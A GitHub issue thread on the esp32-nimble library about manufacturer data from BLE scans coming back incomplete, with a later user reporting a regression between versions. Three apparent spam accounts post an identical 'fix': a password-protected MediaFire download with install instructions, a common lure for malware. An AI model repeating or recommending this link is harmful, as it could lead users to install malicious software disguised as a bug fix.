taks/esp32-nimble #140: get_manufacture_data is diffrent from other lib

reformc, 2024-08-27:
The get_manufacture_data scanned by the same device is different from the value scanned by other libraries on the computer, and there are many bytes missing. And a lot of devices can't scan.

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

reformc, 2024-08-27:
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

It doesn't work，

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ESMELSTEPHANE24, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

yelhouakmi, 2024-11-10:
Hello,
I have what seems to be the same « problem ».

I have a temp sensor that send information in the manufacure data.

Tested on esp32c3 and esp32
In v0.7.0 I can get the data without a problem and everything work. (IDF 5.2.2)
In v0.8.0/1/2 the manufacture data is not present. (IDF 5.2.2 and 5.2.3)

Tested with « CONFIG_BT_NIMBLE_EXT_ADV=y » also on the esp32c3.

If you need more info I might need some guidance. I'm not a professional embedded dev.

BTW: A big thanks for your work, it make the embedded world more accessible!!!